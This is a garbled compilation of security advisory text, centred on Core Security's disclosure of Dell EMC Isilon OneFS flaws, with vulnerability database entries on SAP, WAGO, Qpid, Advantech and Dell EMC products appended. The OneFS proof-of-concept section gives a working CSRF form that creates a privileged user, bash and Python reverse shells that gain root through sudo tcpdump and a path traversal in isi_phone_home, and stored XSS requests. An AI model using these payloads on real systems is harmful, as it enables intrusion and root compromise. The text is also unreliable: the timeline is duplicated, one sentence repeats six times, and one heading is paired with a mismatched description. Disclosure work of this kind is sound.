clearer. 2017-10-11: Core Security thanked for the clarification and confirmed that section will be removed from the final advisory. 2017-10-16: Dell EMC sent a schedule for fixing six of the reported vulnerabilities, with specific dates for every product's version. 2017-10-16: Core Security thanked the information and said it will analyze the proposals sent once all the data is available. 2017-10-19: Dell EMC sent a schedule for the remaining three reported vulnerabilities, with specific dates for every product's version. 2017-10-31: Core Security on the schedule sent, stating that fixing the vulnerabilities by June 2018 is unacceptable given current industry standards. Requested a review of the timeline or a thorough explanation that justifies such delay. 2017-11-01: Dell EMC answered back stating that after reviewing the original schedule, they said they believe they could have fixes ready for versions 8.0.x and 8.1.x by January 2018. Only caveat is the vulnerability 7.1 that might be pushed past January, although they said they think they could meet the January deadline. 2017-11-13: Core Security thanked Dell's review of the release dates and agreed on the proposed schedule, stating Core Security would like to publish a single advisory for all the vulnerabilities reported. Also requested CVE IDs for each of the issues. 2018-01-16: Core Security asked for a status update on the release date for the fixes since there was no update from Dell EMC. 2018-01-17: Dell EMC answered back stating they are awaiting confirmation from the product team about the exact dates of release. They said they will get back to us by the end of this week. Dell EMC also asked our GPG public key again. 2018-01-18: Core Security thanked for the update and sent the advisory's public GPG key. 2018-01-19: Dell EMC stated they are currently working on drafting their advisory and will send it back to us (including CVEs) once they have the necessary approvals. 2018-01-23: Dell EMC asked for our updated draft advisory. 2018-01-25: Dell EMC notified that the team are targeting to have the fix available by February 12th. Additionally, Dell will send its draft advisory by January 31th. 2018-01-29: Core Security thanked for the update and proposed February 14th as publication date. 2018-01-31: Dell EMC informed Core Security that they agreed to release on February 14th. They also provided CVE IDs for each vulnerability reported. 2018-02-01: Dell EMC sent its draft advisory. 2018-02-14: Advisory CORE-2017-0009 published. **References** [1] https://www.dellemc.com/en-us/storage/isilon/onefs-operating-system.htm 10. **About CoreLabs** CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. **About Core Security** Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur. Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com 12. **Disclaimer** The contents of this advisory are copyright (c) 2017 Core Security and (c) 2017 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

Dell EMC Isilon OneFS versions between 8.1.0.0 - 8.1.0.1, 8.0.1.0 - 8.0.1.2, and 8.0.0.0 - 8.0.0.6, versions 7.2.1.x, and version 7.1.1.11 and 8.1.0.2 is affected by a cross-site request forgery vulnerability. A malicious user may potentially exploit this vulnerability to send unauthorized requests to the server on behalf of authenticated users of the application. Dell EMC Isilon OneFS is prone to the following multiple security vulnerabilities. 1. A cross-site request-forgery vulnerability 2. A local privilege escalation vulnerability 3. A remote privilege escalation vulnerability 4. Multiple HTML-injection vulnerabilities Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user or to gain elevated root privileges and perform certain unauthorized actions and gain access to the affected application. OneFS is an operating system that runs on it. A remote attacker could exploit this vulnerability to perform unauthorized operations. Note: In Isilon OneFS, running in compadmin mode, compadmin user is less privileged than the nodes' root users. CVSS v3 Base Score: 6.7 (AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H) Path Traversal Vulnerability (CVE-2018-1204) Dell EMC Isilon OneFS is affected by a path traversal vulnerability in the isi_phone_home tool. A malicious administrator may potentially inject arbitrary HTML or JavaScript code in the user's browser session in the context of the OneFS website. A malicious administrator may potentially inject arbitrary HTML or JavaScript code in the user's browser session in the context of the OneFS website. A malicious administrator may potentially inject arbitrary HTML or JavaScript code in the user's browser session in the context of the OneFS website. A malicious administrator may potentially inject arbitrary HTML or JavaScript code in the user's browser session in the context of the OneFS website. A malicious administrator may potentially inject arbitrary HTML or JavaScript code in the user's browser session in the context of the OneFS website. A malicious administrator may potentially inject arbitrary HTML or JavaScript code in the user's browser session in the context of the OneFS website. CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) Resolution: The following Dell EMC Isilon OneFS maintenance releases addresses these vulnerabilities (except for CVE-2018-1213): Dell EMC Isilon OneFS 8.1.0.2 Patches are available for the below versions: Patch-213283 for OneFS 8.1.0.2 (CVE-2018-1213 only) Patch-217638 for OneFS 8.1.0.1 (all CVEs) Patch-213281 for OneFS 8.1.0.0 (all CVEs) Patch-213280 for OneFS 8.0.1.2 (all CVEs) Patch-213278 for OneFS 8.0.0.6 (all CVEs) Patch-217637 for OneFS 8.0.0.5 (all CVEs) Patch-211980 for OneFS 8.0.0.4 (all CVEs) IMPORTANT: If you update Isilon OneFS with a patch from this list, and you are using Insight IQ, you must upgrade to Insight IQ 4.1.2 prior to installing the patch. This advisory will be updated when fixes are available for additional versions. -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBCAAGBQJar7X8AAoJEHbcu+fsE81ZnVsH/RkfP2XUz4sHV2uQofuZR2bJ 319oyT9XVWUsOwCtQQ2ty/rolXHlO/B1viIq5OYJo4sTrN9s8dupz/Patek9HdiT RR0nvSVEgLM4C8NwB30hwJO8luuO8RDQUc3BQnSo6Vy8b1zM9F7A+yMZgseUoOaW u5jduNB8kvTAAyK4SnujqyBE4eT193x2yxAr15VoMRNFlmmu+S8GHpcCMoE0CDRt 05zhC6wCelN9BA0Bf7D533ffigfP8QAe+zw/OaQgQcEmoe5ys9aaHp2EJaAF5UZN Eh5JtXuwGX3dq0GDdVgbrA0ZlQlLConpBHhZEoIn99YF4MHpbp9l3QbeEYUS2ko= =c/8F -----END PGP SIGNATURE----- . **Advisory Information** Title: Dell EMC Isilon OneFS Multiple Vulnerabilities Advisory ID: CORE-2017-0009 Advisory URL: http://www.coresecurity.com/advisories/dell-emc-isilon-onefs-multiple-vulnerabilities Date published: 2018-02-14 Date of last update: 2018-02-14 Vendors contacted: Dell EMC Release mode: Coordinated release 2. **Vulnerability Information** Class: Cross-Site Request Forgery [CWE-352], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-1213, CVE-2018-1203, CVE-2018-1204, CVE-2018-1186, CVE-2018-1187, CVE-2018-1188, CVE-2018-1189, CVE-2018-1201, CVE-2018-1202 3. **Vulnerability Description** Dell EMC's website states that:[1] The EMC Isilon scale-out NAS storage platform combines modular hardware with unified software to harness unstructured data. Powered by the OneFS operating system, an EMC Isilon cluster delivers a scalable pool of storage with a global namespace. The platform's unified software provides centralized Web-based and command-line administration to manage the following features: - A cluster that runs a distributed file system - Scale-out nodes that add capacity and performance - Storage options that manage files and tiering - Flexible data protection and high availability - Software modules that control costs and optimize resources Multiple vulnerabilities were found in the Isilon OneFS Web console that would allow a remote attacker to gain command execution as root. **Vulnerable Packages** . Dell EMC Isilon OneFS version 8.1.1.0 (CVE-2018-1203, CVE-2018-1204) . **Vendor Information, Solutions and Workarounds** Dell EMC provided a link to the Download for Isilon OneFS page which contains the patches: . https://support.emc.com/downloads/15209_Isilon-OneFS 6. **Credits** These vulnerabilities were discovered and researched by Ivan Huertas and Maximiliano Vidal from Core Security Consulting Services. The publication of this advisory was coordinated by Alberto Solino from Core Advisories Team. **Technical Description / Proof of Concept Code** The Web console contains several sensitive features that are vulnerable to cross-site request forgery. We describe this issue in section 7.1. Sections 7.2 and 7.3 show two vectors to escalate privileges to root. Various persistent cross-site scripting issues are presented in the remaining sections (7.4, 7.5, 7.6, 7.7, 7.8, 7.9). **Cross-site request forgery leading to command execution** [CVE-2018-1213] There are no anti-CSRF tokens in any forms on the Web interface. This would allow an attacker to submit authenticated requests when an authenticated user browses an attacker-controlled domain. The Web console contains a plethora of sensitive actions that can be abused, such as adding new users with SSH access or re-mapping existing storage directories to allow read-write-execute access to all users. All requests are JSON-encoded, which in some cases might hinder exploitation of CSRF vulnerabilities. However, the application does not verify the content-type set. This allows an attacker to exploit the CSRF vulnerabilities by setting a text/plain content-type and sending the request body as JSON_PAYLOAD=ignored. The following proof of concept creates a new user and assigns him a new role with enough privileges to log in via SSH, configure identifies, manage authentication providers, configure the cluster and run the remote support tools. /----- <html> <body> <form id="addUser" target="_blank" action="https://192.168.1.11:8080/platform/1/auth/users?query_member_of=true&resolve_names=true&start=0&zone=System&provider=lsa-local-provider%3ASystem" method="POST" enctype="text/plain"> <input type="hidden" name="{"name":"pepito","enabled":true,"shell":"/bin/zsh","password_expires":false,"password":"pepito"}" value="" /> </form> <form id="addRole" target="_blank" action="https://192.168.1.11:8080/platform/1/auth/roles" method="POST" enctype="text/plain"> <input type="hidden" name="{"members":[{"name":"pepito","type":"user"}],"name":"pepito_role","privileges":[{"id":"ISI_PRIV_AUTH","name":"Auth","read_only":false},{"id":"ISI_PRIV_CLUSTER","name":"Cluster","read_only":false},{"id":"ISI_PRIV_REMOTE_SUPPORT","name":"Remote Support","read_only":false},{"id":"ISI_PRIV_LOGIN_SSH","name":"SSH","read_only":true}]}" value="" /> </form> <script> document.getElementById("addUser").submit(); window.setTimeout(function() { document.getElementById("addRole").submit() }, 1000); </script> </body> </html> -----/ 7.2. **Privilege escalation due to incorrect sudo permissions** [CVE-2018-1203] The compadmin user can run the tcpdump binary with root privileges via sudo. This allows for local privilege escalation, as tcpdump can be instructed to run shell commands when rotating capture files. /----- pepe-1$ id uid=11(compadmin) gid=0(wheel) groups=0(wheel),1(daemon) pepe-1$ cat /tmp/lala.sh #!/bin/bash bash -i >& /dev/tcp/192.168.1.66/8888 0>&1 -----/ Once the desired shell script is in place, the attacker can run tcpdump as follows to trigger the execution: /----- pepe-1$ sudo tcpdump -i em0 -G 1 -z /tmp/lala.sh -w dump tcpdump: WARNING: unable to contact casperd tcpdump: listening on em0, link-type EN10MB (Ethernet), capture size 65535 bytes /tmp/lala.sh: connect: Connection refused /tmp/lala.sh: line 3: /dev/tcp/192.168.1.66/8888: Connection refused /tmp/lala.sh: connect: Connection refused /tmp/lala.sh: line 3: /dev/tcp/192.168.1.66/8888: Connection refused -----/ As can be seen below, the script runs with root privileges: /----- $ nc -lvp 8888 Listening on [0.0.0.0] (family 0, port 8888) Connection from [192.168.1.11] port 8888 [tcp/*] accepted (family 2, sport 57692) bash: no job control in this shell [root@pepe-1 /compadmin]# id uid=0(root) gid=0(wheel) groups=0(wheel),5(operator),10(admin),20(staff),70(ifs) -----/ 7.3. **Privilege escalation via remote support scripts** [CVE-2018-1204] >From the documentation: "OneFS allows remote support through EMC Secure Remote Services (ESRS) which monitors your EMC Isilon cluster, and with your permission, allows remote access to Isilon Technical Support personnel to gather cluster data and troubleshoot issues." "After you enable remote support through ESRS, Isilon Technical Support personnel can request logs with scripts that gather EMC Isilon cluster data and then upload the data. The remote support scripts based on the Isilon isi_gather_info log-gathering tool are located in the /ifs/data/Isilon_Support/ directory on each node." "Additionally, isi_phone_home, a tool that focuses on cluster- and node-specific data, is enabled once you enable ESRS. This tool is pre-set to send information about your cluster to Isilon Technical Support on a weekly basis. You can disable or enable isi_phone_home from the OneFS command-line interface." As a cluster administrator or compadmin, it is possible to enable the remote support functionality, hence enabling the isi_phone_home tool via sudo. This tool is vulnerable to a path traversal when reading the script file to run, which would enable an attacker to execute arbitrary python code with root privileges. If remote support is not enabled, an attacker could perform the following operations in order to enable it: /----- pepe-1$ sudo isi network subnets create 1 ipv4 1 pepe-1$ sudo isi network pools create 1.0 pepe-1$ sudo isi remotesupport connectemc modify --enabled=yes --primary-esrs-gateway=10.10.10.10 --use-smtp-failover=no --gateway-access-pools=1.0 -----/ The isi_phone_home tool is supposed to run scripts located in the root-only writable directory /usr/local/isi_phone_home/script. However, the provided script name is used to construct the file path without sanitization, allowing an attacker to reference other locations. /----- def run_script(script_file_name): script_path = CFG.get('SCRIPTDIR') + '/' + script_file_name if os.path.isfile(script_path): cmd = 'python ' + script_path + ' 2>&1 ' command_thread = command.Command(cmd) exit_code, output = command_thread.run(int(CFG.get("SCRIPT_TIEMOUT"))) if exit_code: logging.error("Error: {0} running script: {1} ".format(str(exit_code), output)) else: logging.error("File: {0} list_file_name doesn't exist ".format(script_path)) -----/ The final step would be to create a malicious python script on any writable location and call it via the isi_phone_tool using sudo. Keep in mind that the previous steps are not required if the system does already have remote support enabled. /----- pepe-1$ cat /tmp/lala.py #!/usr/bin/env python import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("192.168.1.66",8888)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"]) pepe-1$ sudo /usr/bin/isi_phone_home --script-file ../../../../../tmp/lala.py -----/ /----- $ nc -lvp 8888 Listening on [0.0.0.0] (family 0, port 8888) Connection from [192.168.1.11] port 8888 [tcp/*] accepted (family 2, sport 56807) pepe-1# id uid=0(root) gid=0(wheel) groups=0(wheel),5(operator),10(admin),20(staff),70(ifs) -----/ 7.4. *Persistent cross-site scripting in the cluster description* [CVE-2018-1186] The description parameter of the /cluster/identity endpoint is vulnerable to cross-site scripting. After the cluster's description is updated, the payload will be executed every time the user opens the Web console. /----- PUT /platform/3/cluster/identity HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 61 Cookie: isisessid=91835dd1-49de-4d40-9f09-94f6d029df24; Connection: close {"description":"my cluster<img src=x onerror=\"alert(1)\"/>"} -----/ 7.5. **Persistent cross-site scripting in the Network Configuration page** [CVE-2018-1187] The description parameter of the /network/groupnets endpoint is vulnerable to cross-site scripting. After the description is updated, the payload will be executed every time the user opens the network configuration page. /----- POST /platform/4/network/groupnets HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/json Content-Length: 186 Cookie: isisessid=31f92221-15bb-421d-be00-d2bf42964c41; Connection: close {"description":"lala<script>alert(1)</script>","dns_cache_enabled":true,"dns_options":[],"dns_search":[],"dns_servers":[],"name":"pepito2","server_side_dns_search":false} -----/ 7.6. **Persistent cross-site scripting in the Authentication Providers page** [CVE-2018-1188] The realm parameter of the /auth/settings/krb5/realms endpoint is vulnerable to cross-site scripting. After the realm is updated, the payload will be executed every time the user opens the Kerberos tab of the Authentication Providers page. /----- POST /platform/1/auth/settings/krb5/realms HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/json Content-Length: 78 Cookie: isisessid=31f92221-15bb-421d-be00-d2bf42964c41; Connection: close {"is_default_realm":true,"kdc":[],"realm":"ASDASD<img src=x onerror=alert(1)"} -----/ 7.7. **Persistent cross-site scripting in the Antivirus page** [CVE-2018-1189] The name parameter of the /antivirus/policies endpoint is vulnerable to cross-site scripting. After the name is updated, the payload will be executed every time the user opens the Antivirus page. /----- POST /platform/3/antivirus/policies HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/json Content-Length: 172 Cookie: isisessid=c6903f55-43e7-42e2-b587-9f68142c3e06; Connection: close {"name":"pepe<img src=x onerror=\"alert(1)\"/>","description":"pepito","enabled":true,"force_run":false,"impact":null,"paths":["/ifs"],"recursion_depth":-1,"schedule":null} -----/ 7.8. **Persistent cross-site scripting in the Job Operations page** [CVE-2018-1201] The description parameter of the /job/policies endpoint is vulnerable to cross-site scripting. After the description is updated, the payload will be executed every time the user opens the Impact Policies section of the Job Operations page. /----- POST /platform/1/job/policies HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 210 Cookie: isisessid=8a5026c0-f045-4505-9d2b-ae83bc90f8ea; Connection: close {"name":"my policy","description":"<img src=x onerror=\"alert(1)\"/>","intervals":[{"begin":"Sunday 00:00","end":"Sunday 00:00","impact":"Low"},{"impact":"Low","begin":"Sunday 01:03","end":"Monday 01:01"}]} -----/ 7.9. **Persistent cross-site scripting in the NDMP page** [CVE-2018-1202] The name parameter of the /protocols/ndmp/users endpoint is vulnerable to cross-site scripting. After the name is updated, the payload will be executed every time the user opens the NDMP Settings section of the NDMP page. /----- POST /platform/3/protocols/ndmp/users HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 64 Cookie: isisessid=91835dd1-49de-4d40-9f09-94f6d029df24; Connection: close {"name":"<img src=x onerror=\"alert(1)\"/>","password":"123123"} -----/ 8. **Report Timeline** 2017-09-25: Core Security sent an initial notification to Dell EMC, including a draft advisory. 2017-09-26: Dell EMC confirmed reception and informed an initial response would be ready by October 5th. 2017-10-05: Dell EMC confirmed problem exists for all vulnerabilities reported except one, for which evaluation will be finalized soon. Dell EMC stated that, for the confirmed issues, a remediation plan will be provided by 10/16. 2017-10-05: Core Security thanked the follow up email. 2017-10-06: Dell EMC reported an update on one privilege escalation vulnerability reported, stating that 'ISI_PRIV_AUTH, and ISI_PRIV_ROLE both are equivalent to admin level access'. They said they will be updating the documentation to make it clearer. 2017-10-11: Core Security thanked for the clarification and confirmed that section will be removed from the final advisory. 2017-10-16: Core Security thanked the information and said it will analyze the proposals sent once all the data is available. 2017-10-31: Core Security on the schedule sent, stating that fixing the vulnerabilities by June 2018 is unacceptable given current industry standards. Requested a review of the timeline or a thorough explanation that justifies such delay. 2017-11-01: Dell EMC answered back stating that after reviewing the original schedule, they said they believe they could have fixes ready for versions 8.0.x and 8.1.x by January 2018. Only caveat is the vulnerability 7.1 that might be pushed past January, although they said they think they could meet the January deadline. 2017-11-13: Core Security thanked Dell's review of the release dates and agreed on the proposed schedule, stating Core Security would like to publish a single advisory for all the vulnerabilities reported. Also requested CVE IDs for each of the issues. 2018-01-16: Core Security asked for a status update on the release date for the fixes since there was no update from Dell EMC. 2018-01-17: Dell EMC answered back stating they are awaiting confirmation from the product team about the exact dates of release. They said they will get back to us by the end of this week. Dell EMC also asked our GPG public key again. 2018-01-18: Core Security thanked for the update and sent the advisory's public GPG key. 2018-01-19: Dell EMC stated they are currently working on drafting their advisory and will send it back to us (including CVEs) once they have the necessary approvals. 2018-01-23: Dell EMC asked for our updated draft advisory. 2018-01-25: Dell EMC notified that the team are targeting to have the fix available by February 12th. Additionally, Dell will send its draft advisory by January 31th. 2018-01-29: Core Security thanked for the update and proposed February 14th as publication date. 2018-01-31: Dell EMC informed Core Security that they agreed to release on February 14th. They also provided CVE IDs for each vulnerability reported. 2018-02-01: Dell EMC sent its draft advisory. 2018-02-14: Advisory CORE-2017-0009 published. **References** [1] https://www.dellemc.com/en-us/storage/isilon/onefs-operating-system.htm 10. **About CoreLabs** CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. **About Core Security** Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur. Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com 12. **Disclaimer** The contents of this advisory are copyright (c) 2017 Core Security and (c) 2017 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

The SAML 2.0 service provider of SAP Netweaver AS Java Web Application, 7.50, does not sufficiently encode user controlled inputs, which results in Cross-Site Scripting (XSS) vulnerability. Remote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks

SAP NetWeaver System Landscape Directory, LM-CORE 7.10, 7.20, 7.30, 7.31, 7.40, does not perform any authentication checks for functionalities that require user identity. SAP NetWeaver System Landscape Directory Is vulnerable to a lack of authentication for critical functions.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. SAP NetWeaver System Landscape Directory is prone to an authentication-bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks

SAP NetWeaver Portal, WebDynpro Java, 7.30, 7.31, 7.40, 7.50, does not sufficiently encode user controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. Remote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks

An Improper Authentication issue was discovered in WAGO PFC200 Series 3S CoDeSys Runtime versions 2.3.X and 2.4.X. An attacker can execute different unauthenticated remote operations because of the CoDeSys Runtime application, which is available via network by default on Port 2455. An attacker could execute some unauthenticated commands such as reading, writing, or deleting arbitrary files, or manipulate the PLC application during runtime by sending specially-crafted TCP packets to Port 2455. WAGO PFC200 series 3S CoDeSys Runtime Contains an authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. WAGO PFC200 is a bus editable logic controller module from WAGO, Germany

A Denial of Service vulnerability was found in Apache Qpid Dispatch Router versions 0.7.0 and 0.8.0. To exploit this vulnerability, a remote user must be able to establish an AMQP connection to the Qpid Dispatch Router and send a specifically crafted AMQP frame which will cause it to segfault and shut down. Apache Qpid Dispatch Router Contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. An attacker can exploit this issue to cause a denial-of-service condition, denying service to legitimate users

The VBWinExec function in Node\AspVBObj.dll in Advantech WebAccess 8.3.0 allows remote attackers to execute arbitrary OS commands via a single argument (aka the command parameter). Advantech WebAccess Is OS A command injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. The 'VBWinExec' function of the NodeAspVBObj.dll file in Advantech WebAccess version 8.3.0 has an operating system command injection vulnerability

An arbitrary file upload vulnerability was discovered in vApp Manager which is embedded in Dell EMC Unisphere for VMAX, Dell EMC Solutions Enabler, Dell EMC VASA Virtual Appliances, and Dell EMC VMAX Embedded Management (eManagement): Dell EMC Unisphere for VMAX Virtual Appliance versions prior to 8.4.0.18, Dell EMC Solutions Enabler Virtual Appliance versions prior to 8.4.0.21, Dell EMC VASA Virtual Appliance versions prior to 8.4.0.514, and Dell EMC VMAX Embedded Management (eManagement) versions prior to and including 1.4 (Enginuity Release 5977.1125.1125 and earlier). A remote authenticated malicious user may potentially upload arbitrary maliciously crafted files in any location on the web server. By chaining this vulnerability with CVE-2018-1216, the attacker may use the default account to exploit this vulnerability. plural Dell EMC The product contains a vulnerability related to unlimited uploads of dangerous types of files.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. DellEMC UnisphereforVMAXVirtualAppliance and others are products of Dell Corporation of the United States. DellEMCUnisphereforVMAXVirtualAppliance(vApp) is a management tool for VMAX storage arrays. EMCSolutionsEnablerVirtualAppliance is a solution application virtual appliance. Any file upload vulnerability exists in several Dell products. CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) CVE-2018-1216 Hard-coded password vulnerability The vApp Manager contains an undocumented default account (OsmcO) with a hard-coded password that may be used with certain web servlets. A remote attacker with the knowledge of the hard-coded password and the message format may use vulnerable servlets to gain unauthorized access to the system. Note: This account cannot be used to log in via the web user interface. Note: The default account OsmcO has been removed for all fresh installations of versions of the products that contain the fixes. The account cannot be removed from the user database for upgrade situations, however all servlets that use this account have been removed from the application making the account obsolete. Open a Service Request to have the hotfix or ePack installed. Contact Dell EMC Support with any questions. Credits: Dell EMC would like to thank Carlos Perez from Tenable for reporting these vulnerabilities. For an explanation of Severity Ratings, refer to Dell EMC Knowledgebase article 468307. Dell EMC recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability. Legal Information: Read and use the information in this Dell EMC Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this product alert, contact Dell EMC Technical Support at 1-877-534-2867. Dell EMC recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. Dell EMC disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event, shall Dell EMC or its suppliers, be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Dell EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply. Dell EMC Product Security Response Center security_alert@emc.com -----BEGIN PGP SIGNATURE----- Comment: GPGTools - https://gpgtools.org iQEcBAEBCgAGBQJagPFFAAoJEHbcu+fsE81ZivMH/0s0r4XFxvW9tL+l8zkGdJIc uRjYTAr5iE4I8PaLw0S/MYVIr2YbpBcaP5QuUbNENWr/aaPHtccE3Gou6Bv72FK0 CU2qMdV9kjWbhHvbIjrnS2RsNjTekWSIDjYJPdkHk03thutYa3Loy7bX42LJe6E7 +slgZjR5zkATMvGis2R/nEj40phxxA+I/dUJIMjbT7emBCSBL5IAlvmuznzChm31 hklk6F/YDI/iOC8GBo0PwNf2F6PBUJbR78B6ppLeHP8AygLdu/AZZX/5eHyDGBiS 8eHATltqjU5I8X7fnjKl8UtoL1ohw72tMROiN9164N2xoJQwasMX6Rs3eNpru2c= =HaYf -----END PGP SIGNATURE-----

A hard-coded password vulnerability was discovered in vApp Manager which is embedded in Dell EMC Unisphere for VMAX, Dell EMC Solutions Enabler, Dell EMC VASA Virtual Appliances, and Dell EMC VMAX Embedded Management (eManagement): Dell EMC Unisphere for VMAX Virtual Appliance versions prior to 8.4.0.18, Dell EMC Solutions Enabler Virtual Appliance versions prior to 8.4.0.21, Dell EMC VASA Virtual Appliance versions prior to 8.4.0.514, and Dell EMC VMAX Embedded Management (eManagement) versions prior to and including 1.4 (Enginuity Release 5977.1125.1125 and earlier). They contain an undocumented default account (smc) with a hard-coded password that may be used with certain web servlets. A remote attacker with the knowledge of the hard-coded password and the message format may use vulnerable servlets to gain unauthorized access to the system. Note: This account cannot be used to log in via the web user interface. plural Dell EMC The product contains a vulnerability related to the use of hard-coded credentials.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. DellEMC UnisphereforVMAXVirtualAppliance and others are products of Dell Corporation of the United States. DellEMCUnisphereforVMAXVirtualAppliance(vApp) is a management tool for VMAX storage arrays. EMCSolutionsEnablerVirtualAppliance is a solution application virtual appliance. vAppManager is one of the vApp management tools. Multiple Dell EMC Products are prone to an arbitrary file-upload vulnerability and a security-bypass vulnerability. An attacker can exploit these issues to upload arbitrary files in the context of the web server process or to bypass the security mechanism and perform unauthorized actions. Note: The default account OsmcO has been removed for all fresh installations of versions of the products that contain the fixes. The account cannot be removed from the user database for upgrade situations, however all servlets that use this account have been removed from the application making the account obsolete. Open a Service Request to have the hotfix or ePack installed. Contact Dell EMC Support with any questions. Credits: Dell EMC would like to thank Carlos Perez from Tenable for reporting these vulnerabilities. For an explanation of Severity Ratings, refer to Dell EMC Knowledgebase article 468307. Dell EMC recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability. Legal Information: Read and use the information in this Dell EMC Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this product alert, contact Dell EMC Technical Support at 1-877-534-2867. Dell EMC recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. Dell EMC disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for 